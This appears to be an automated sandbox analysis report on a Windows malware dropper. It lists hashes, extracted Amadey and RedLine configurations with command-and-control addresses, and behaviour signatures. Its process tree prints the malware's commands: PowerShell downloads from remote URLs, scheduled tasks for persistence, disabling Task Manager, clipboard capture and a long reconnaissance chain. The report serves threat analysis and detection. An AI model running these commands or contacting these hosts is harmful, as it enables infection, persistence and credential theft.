Analysis

  • max time kernel
    147s
  • max time network
    151s
  • platform
    windows11-21h2_x64
  • resource
    win11-20240508-en
  • resource tags

    arch:x64arch:x86image:win11-20240508-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    25-06-2024 11:28

General

  • Target

    fab916adc5edb63a42389cdf2c0fd20c4338b574f41dc74ce73323ed4f67d567.exe

  • Size

    1.8MB

  • MD5

    0b42ed4bcf39831f68190c8e90e243f1

  • SHA1

    69f2ca87ccaf0d00164a88361f30a366c7ef76aa

  • SHA256

    fab916adc5edb63a42389cdf2c0fd20c4338b574f41dc74ce73323ed4f67d567

  • SHA512

    d09e38dfe707adeb91405e6a7e719c9c8fba400272b3c19a896968fadedb85117120dcedddcbb36a96dadaa1d8aa7fc25c19167b9f0b0dd9833073b24a032c3b

  • SSDEEP

    49152:TxILwY21sreRAPeED1ERS7nBL0OvkOTDNWN+:TxILwYlNPeNS7nR063NWN

Malware Config

Extracted

Family

amadey

Version

8254624243

Botnet

e76b71

C2

http://77.91.77.81

Attributes
  • install_dir

    8254624243

  • install_file

    axplong.exe

  • strings_key

    90049e51fabf09df0d6748e0b271922e

  • url_paths

    /Kiru9gu/index.php

rc4.plain

Extracted

Family

redline

Botnet

AMA

C2

185.215.113.67:40960

Extracted

Family

redline

Botnet

LiveTraffic

C2

4.184.236.127:1110

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Detects Monster Stealer. 2 IoCs
  • Exela Stealer

    Exela Stealer is an open source stealer originally written in .NET and later transitioned to Python that was first observed in August 2023.

  • Monster

    Monster is a Golang stealer that was discovered in 2024.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine payload 3 IoCs
  • Grants admin privileges 1 TTPs

    Uses net.exe to modify the user's privileges.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 5 IoCs
  • Blocklisted process makes network request 4 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Using powershell.exe command.

  • Disables Task Manager via registry modification
  • Downloads MZ/PE file
  • Modifies Windows Firewall 2 TTPs 2 IoCs
  • Checks BIOS information in registry 2 TTPs 10 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Executes dropped EXE 18 IoCs
  • Identifies Wine through registry keys 2 TTPs 5 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Loads dropped DLL 33 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 5 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Drops file in Windows directory 2 IoCs
  • Launches sc.exe 1 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Embeds OpenSSL 1 IoCs

    Embeds OpenSSL, may be used to circumvent TLS interception.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 9 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • Program crash 3 IoCs
  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Collects information from the system 1 TTPs 1 IoCs

    Uses WMIC.exe to find detailed system information.

  • Enumerates processes with tasklist 1 TTPs 3 IoCs
  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Gathers network information 2 TTPs 2 IoCs

    Uses commandline utility to view network configuration.

  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Kills process with taskkill 1 IoCs
  • Modifies registry class 1 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • Runs net.exe
  • Scheduled Task/Job: Scheduled Task 1 TTPs 5 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 47 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 26 IoCs
  • Suspicious use of SendNotifyMessage 12 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\fab916adc5edb63a42389cdf2c0fd20c4338b574f41dc74ce73323ed4f67d567.exe
    "C:\Users\Admin\AppData\Local\Temp\fab916adc5edb63a42389cdf2c0fd20c4338b574f41dc74ce73323ed4f67d567.exe"
    1⤵
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Checks BIOS information in registry
    • Identifies Wine through registry keys
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Drops file in Windows directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of WriteProcessMemory
    PID:2892
    • C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe
      "C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe"
      2⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Checks BIOS information in registry
      • Executes dropped EXE
      • Identifies Wine through registry keys
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:976
      • C:\Users\Admin\AppData\Local\Temp\1000007001\ama.exe
        "C:\Users\Admin\AppData\Local\Temp\1000007001\ama.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3152
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.co/1lLub
          4⤵
          • Enumerates system info in registry
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of SendNotifyMessage
          PID:3620
          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffb26b03cb8,0x7ffb26b03cc8,0x7ffb26b03cd8
            5⤵
              PID:3000
            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1852,2066988706713078084,15327343310877477141,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1920 /prefetch:2
              5⤵
                PID:3992
              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1852,2066988706713078084,15327343310877477141,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2256 /prefetch:3
                5⤵
                • Suspicious behavior: EnumeratesProcesses
                PID:132
              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1852,2066988706713078084,15327343310877477141,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2860 /prefetch:8
                5⤵
                  PID:5036
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1852,2066988706713078084,15327343310877477141,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3288 /prefetch:1
                  5⤵
                    PID:2172
                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1852,2066988706713078084,15327343310877477141,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3308 /prefetch:1
                    5⤵
                      PID:2336
                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1852,2066988706713078084,15327343310877477141,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5116 /prefetch:8
                      5⤵
                      • Suspicious behavior: EnumeratesProcesses
                      PID:3748
                    • C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1852,2066988706713078084,15327343310877477141,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5408 /prefetch:8
                      5⤵
                      • Suspicious behavior: EnumeratesProcesses
                      PID:4324
                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1852,2066988706713078084,15327343310877477141,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4964 /prefetch:1
                      5⤵
                        PID:4244
                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1852,2066988706713078084,15327343310877477141,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3776 /prefetch:1
                        5⤵
                          PID:4580
                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1852,2066988706713078084,15327343310877477141,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3316 /prefetch:1
                          5⤵
                            PID:3360
                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1852,2066988706713078084,15327343310877477141,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5640 /prefetch:1
                            5⤵
                              PID:2112
                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1852,2066988706713078084,15327343310877477141,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=4924 /prefetch:2
                              5⤵
                              • Suspicious behavior: EnumeratesProcesses
                              PID:1284
                          • C:\Users\Admin\AppData\Local\Temp\6.exe
                            "C:\Users\Admin\AppData\Local\Temp\6.exe"
                            4⤵
                            • Executes dropped EXE
                            • Suspicious behavior: EnumeratesProcesses
                            PID:788
                          • C:\Users\Admin\AppData\Local\Temp\7.exe
                            "C:\Users\Admin\AppData\Local\Temp\7.exe"
                            4⤵
                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                            • Checks BIOS information in registry
                            • Executes dropped EXE
                            • Identifies Wine through registry keys
                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                            • Suspicious behavior: EnumeratesProcesses
                            PID:1040
                        • C:\Users\Admin\AppData\Local\Temp\1000035001\gold.exe
                          "C:\Users\Admin\AppData\Local\Temp\1000035001\gold.exe"
                          3⤵
                          • Executes dropped EXE
                          • Suspicious use of SetThreadContext
                          • Suspicious use of WriteProcessMemory
                          PID:3456
                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                            4⤵
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            PID:32
                          • C:\Windows\SysWOW64\WerFault.exe
                            C:\Windows\SysWOW64\WerFault.exe -u -p 3456 -s 300
                            4⤵
                            • Program crash
                            PID:3640
                        • C:\Users\Admin\AppData\Local\Temp\1000047001\lummac2.exe
                          "C:\Users\Admin\AppData\Local\Temp\1000047001\lummac2.exe"
                          3⤵
                          • Executes dropped EXE
                          PID:4988
                        • C:\Users\Admin\AppData\Local\Temp\1000064001\NewLatest.exe
                          "C:\Users\Admin\AppData\Local\Temp\1000064001\NewLatest.exe"
                          3⤵
                          • Executes dropped EXE
                          • Drops file in Windows directory
                          • Suspicious use of WriteProcessMemory
                          PID:112
                          • C:\Users\Admin\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
                            "C:\Users\Admin\AppData\Local\Temp\b66a8ae076\Hkbsse.exe"
                            4⤵
                            • Executes dropped EXE
                            PID:4196
                            • C:\Users\Admin\AppData\Local\Temp\1000020001\1.exe
                              "C:\Users\Admin\AppData\Local\Temp\1000020001\1.exe"
                              5⤵
                              • Executes dropped EXE
                              • Checks SCSI registry key(s)
                              PID:4184
                              • C:\Windows\SysWOW64\WerFault.exe
                                C:\Windows\SysWOW64\WerFault.exe -u -p 4184 -s 488
                                6⤵
                                • Program crash
                                PID:4776
                        • C:\Users\Admin\AppData\Local\Temp\1000091001\Installer.exe
                          "C:\Users\Admin\AppData\Local\Temp\1000091001\Installer.exe"
                          3⤵
                          • Executes dropped EXE
                          • Adds Run key to start application
                          • Suspicious use of WriteProcessMemory
                          PID:780
                          • C:\Windows\SYSTEM32\cmd.exe
                            cmd /c ins.bat
                            4⤵
                            • Suspicious use of WriteProcessMemory
                            PID:4008
                            • C:\Windows\system32\schtasks.exe
                              schtasks.exe /create /SC MINUTE /MO 10 /TN "CCleaner" /TR "\"C:\Program Files\Google\Chrome\Application\chrome.exe\" http://starjod.xyz/Website.php"
                              5⤵
                              • Scheduled Task/Job: Scheduled Task
                              PID:4444
                            • C:\Windows\system32\schtasks.exe
                              schtasks.exe /create /SC MINUTE /MO 11 /TN "Updater" /TR "\"C:\Program Files\Google\Chrome\Application\chrome.exe\" http://starjod.xyz/Website.php"
                              5⤵
                              • Scheduled Task/Job: Scheduled Task
                              PID:4016
                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              powershell -Command "Invoke-WebRequest -Uri 'https://bit.ly/4c7L8Zs' -UseBasicParsing >$null"
                              5⤵
                              • Blocklisted process makes network request
                              • Command and Scripting Interpreter: PowerShell
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of AdjustPrivilegeToken
                              PID:1440
                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              powershell -Command "Start-Process 'C:\Users\Admin\AppData\Local\Temp\install.bat' -Verb runAs -WindowStyle Hidden"
                              5⤵
                              • Command and Scripting Interpreter: PowerShell
                              • Modifies registry class
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of AdjustPrivilegeToken
                              • Suspicious use of WriteProcessMemory
                              PID:4612
                              • C:\Windows\System32\cmd.exe
                                "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\install.bat"
                                6⤵
                                • Suspicious use of WriteProcessMemory
                                PID:2860
                                • C:\Windows\system32\schtasks.exe
                                  schtasks /create /tn "Cleaner" /tr "C:\Users\Admin\AppData\Local\Corporation\File\RemoteExecuteScriptSilent.exe" /sc onstart /delay 0005:00
                                  7⤵
                                  • Scheduled Task/Job: Scheduled Task
                                  PID:1572
                                • C:\Windows\system32\reg.exe
                                  reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /f /v DisableTaskMgr /t REG_DWORD /d 00000001
                                  7⤵
                                  • Modifies registry key
                                  PID:3032
                                • C:\Windows\system32\schtasks.exe
                                  schtasks.exe /create /SC MINUTE /MO 10 /TN "CCleaner" /TR "\"C:\Program Files\Google\Chrome\Application\chrome.exe\" http://starjod.xyz/Website.php" /F
                                  7⤵
                                  • Scheduled Task/Job: Scheduled Task
                                  PID:4948
                                • C:\Windows\system32\schtasks.exe
                                  schtasks.exe /create /SC MINUTE /MO 11 /TN "Updater" /TR "\"C:\Program Files\Google\Chrome\Application\chrome.exe\" http://starjod.xyz/Website.php" /F
                                  7⤵
                                  • Scheduled Task/Job: Scheduled Task
                                  PID:3280
                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              powershell -Command "Invoke-WebRequest -Uri 'https://github.com/frielandrews892/File/releases/download/File/File.zip' -OutFile 'C:\Users\Admin\AppData\Local\Corporation.zip'"
                              5⤵
                              • Blocklisted process makes network request
                              • Command and Scripting Interpreter: PowerShell
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of AdjustPrivilegeToken
                              PID:5056
                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              powershell -Command "Expand-Archive -Path 'C:\Users\Admin\AppData\Local\Corporation.zip' -DestinationPath 'C:\Users\Admin\AppData\Local\Corporation'"
                              5⤵
                              • Command and Scripting Interpreter: PowerShell
                              • Suspicious behavior: EnumeratesProcesses
                              PID:2824
                            • C:\Windows\system32\schtasks.exe
                              schtasks /query /TN "Cleaner"
                              5⤵
                                PID:3740
                          • C:\Users\Admin\AppData\Local\Temp\1000092001\legs.exe
                            "C:\Users\Admin\AppData\Local\Temp\1000092001\legs.exe"
                            3⤵
                            • Executes dropped EXE
                            • Suspicious use of SetThreadContext
                            • Suspicious use of WriteProcessMemory
                            PID:3088
                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                              4⤵
                                PID:2704
                              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                4⤵
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of AdjustPrivilegeToken
                                PID:1408
                              • C:\Windows\SysWOW64\WerFault.exe
                                C:\Windows\SysWOW64\WerFault.exe -u -p 3088 -s 284
                                4⤵
                                • Program crash
                                PID:4084
                            • C:\Users\Admin\AppData\Local\Temp\1000094001\taskweaker.exe
                              "C:\Users\Admin\AppData\Local\Temp\1000094001\taskweaker.exe"
                              3⤵
                              • Executes dropped EXE
                              • Suspicious use of SetThreadContext
                              PID:1756
                              • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                4⤵
                                  PID:4444
                              • C:\Users\Admin\AppData\Local\Temp\1000101001\judit.exe
                                "C:\Users\Admin\AppData\Local\Temp\1000101001\judit.exe"
                                3⤵
                                • Executes dropped EXE
                                PID:4812
                                • C:\Users\Admin\AppData\Local\Temp\onefile_4812_133637885410739094\stub.exe
                                  "C:\Users\Admin\AppData\Local\Temp\1000101001\judit.exe"
                                  4⤵
                                  • Executes dropped EXE
                                  • Loads dropped DLL
                                  PID:3068
                                  • C:\Windows\system32\cmd.exe
                                    C:\Windows\system32\cmd.exe /c "ver"
                                    5⤵
                                      PID:3792
                                    • C:\Windows\system32\cmd.exe
                                      C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                      5⤵
                                        PID:2508
                                        • C:\Windows\System32\Wbem\WMIC.exe
                                          wmic csproduct get uuid
                                          6⤵
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:1196
                                      • C:\Windows\system32\cmd.exe
                                        C:\Windows\system32\cmd.exe /c "tasklist"
                                        5⤵
                                          PID:2964
                                          • C:\Windows\system32\tasklist.exe
                                            tasklist
                                            6⤵
                                            • Enumerates processes with tasklist
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:1464
                                        • C:\Windows\system32\cmd.exe
                                          C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\MonsterUpdateService\Monster.exe""
                                          5⤵
                                          • Hide Artifacts: Hidden Files and Directories
                                          PID:232
                                          • C:\Windows\system32\attrib.exe
                                            attrib +h +s "C:\Users\Admin\AppData\Local\MonsterUpdateService\Monster.exe"
                                            6⤵
                                            • Views/modifies file attributes
                                            PID:2548
                                        • C:\Windows\system32\cmd.exe
                                          C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('%error_message%', 0, 'System Error', 0+16);close()""
                                          5⤵
                                            PID:412
                                          • C:\Windows\system32\cmd.exe
                                            C:\Windows\system32\cmd.exe /c "taskkill /F /IM chrome.exe"
                                            5⤵
                                              PID:3128
                                              • C:\Windows\system32\taskkill.exe
                                                taskkill /F /IM chrome.exe
                                                6⤵
                                                • Kills process with taskkill
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:3096
                                            • C:\Windows\system32\cmd.exe
                                              C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                              5⤵
                                                PID:1076
                                                • C:\Windows\system32\tasklist.exe
                                                  tasklist /FO LIST
                                                  6⤵
                                                  • Enumerates processes with tasklist
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:1532
                                              • C:\Windows\system32\cmd.exe
                                                C:\Windows\system32\cmd.exe /c "powershell.exe Get-Clipboard"
                                                5⤵
                                                  PID:1936
                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    powershell.exe Get-Clipboard
                                                    6⤵
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:1028
                                                • C:\Windows\system32\cmd.exe
                                                  C:\Windows\system32\cmd.exe /c "chcp"
                                                  5⤵
                                                    PID:764
                                                    • C:\Windows\system32\chcp.com
                                                      chcp
                                                      6⤵
                                                        PID:1920
                                                    • C:\Windows\system32\cmd.exe
                                                      C:\Windows\system32\cmd.exe /c "chcp"
                                                      5⤵
                                                        PID:2964
                                                        • C:\Windows\system32\chcp.com
                                                          chcp
                                                          6⤵
                                                            PID:2764
                                                        • C:\Windows\system32\cmd.exe
                                                          C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config"
                                                          5⤵
                                                            PID:1416
                                                            • C:\Windows\system32\systeminfo.exe
                                                              systeminfo
                                                              6⤵
                                                              • Gathers system information
                                                              PID:1944
                                                            • C:\Windows\system32\HOSTNAME.EXE
                                                              hostname
                                                              6⤵
                                                                PID:1000
                                                              • C:\Windows\System32\Wbem\WMIC.exe
                                                                wmic logicaldisk get caption,description,providername
                                                                6⤵
                                                                • Collects information from the system
                                                                • Suspicious use of AdjustPrivilegeToken
                                                                PID:544
                                                              • C:\Windows\system32\net.exe
                                                                net user
                                                                6⤵
                                                                  PID:1072
                                                                  • C:\Windows\system32\net1.exe
                                                                    C:\Windows\system32\net1 user
                                                                    7⤵
                                                                      PID:4388
                                                                  • C:\Windows\system32\query.exe
                                                                    query user
                                                                    6⤵
                                                                      PID:4132
                                                                      • C:\Windows\system32\quser.exe
                                                                        "C:\Windows\system32\quser.exe"
                                                                        7⤵
                                                                          PID:4596
                                                                      • C:\Windows\system32\net.exe
                                                                        net localgroup
                                                                        6⤵
                                                                          PID:4204
                                                                          • C:\Windows\system32\net1.exe
                                                                            C:\Windows\system32\net1 localgroup
                                                                            7⤵
                                                                              PID:1364
                                                                          • C:\Windows\system32\net.exe
                                                                            net localgroup administrators
                                                                            6⤵
                                                                              PID:1936
                                                                              • C:\Windows\system32\net1.exe
                                                                                C:\Windows\system32\net1 localgroup administrators
                                                                                7⤵
                                                                                  PID:852
                                                                              • C:\Windows\system32\net.exe
                                                                                net user guest
                                                                                6⤵
                                                                                  PID:1028
                                                                                  • C:\Windows\system32\net1.exe
                                                                                    C:\Windows\system32\net1 user guest
                                                                                    7⤵
                                                                                      PID:4840
                                                                                  • C:\Windows\system32\net.exe
                                                                                    net user administrator
                                                                                    6⤵
                                                                                      PID:1800
                                                                                      • C:\Windows\system32\net1.exe
                                                                                        C:\Windows\system32\net1 user administrator
                                                                                        7⤵
                                                                                          PID:400
                                                                                      • C:\Windows\System32\Wbem\WMIC.exe
                                                                                        wmic startup get caption,command
                                                                                        6⤵
                                                                                          PID:2184
                                                                                        • C:\Windows\system32\tasklist.exe
                                                                                          tasklist /svc
                                                                                          6⤵
                                                                                          • Enumerates processes with tasklist
                                                                                          PID:540
                                                                                        • C:\Windows\system32\ipconfig.exe
                                                                                          ipconfig /all
                                                                                          6⤵
                                                                                          • Gathers network information
                                                                                          PID:4288
                                                                                        • C:\Windows\system32\ROUTE.EXE
                                                                                          route print
                                                                                          6⤵
                                                                                            PID:2600
                                                                                          • C:\Windows\system32\ARP.EXE
                                                                                            arp -a
                                                                                            6⤵
                                                                                              PID:1944
                                                                                            • C:\Windows\system32\NETSTAT.EXE
                                                                                              netstat -ano
                                                                                              6⤵
                                                                                              • Gathers network information
                                                                                              PID:1016
                                                                                            • C:\Windows\system32\sc.exe
                                                                                              sc query type= service state= all
                                                                                              6⤵
                                                                                              • Launches sc.exe
                                                                                              PID:1196
                                                                                            • C:\Windows\system32\netsh.exe
                                                                                              netsh firewall show state
                                                                                              6⤵
                                                                                              • Modifies Windows Firewall
                                                                                              • Event Triggered Execution: Netsh Helper DLL
                                                                                              PID:1532
                                                                                            • C:\Windows\system32\netsh.exe
                                                                                              netsh firewall show config
                                                                                              6⤵
                                                                                              • Modifies Windows Firewall
                                                                                              • Event Triggered Execution: Netsh Helper DLL
                                                                                              PID:5028
                                                                                          • C:\Windows\system32\cmd.exe
                                                                                            C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"
                                                                                            5⤵
                                                                                              PID:2972
                                                                                              • C:\Windows\system32\netsh.exe
                                                                                                netsh wlan show profiles
                                                                                                6⤵
                                                                                                • Event Triggered Execution: Netsh Helper DLL
                                                                                                PID:2184
                                                                                            • C:\Windows\system32\cmd.exe
                                                                                              C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                                                                              5⤵
                                                                                                PID:1804
                                                                                                • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                  wmic csproduct get uuid
                                                                                                  6⤵
                                                                                                    PID:1016
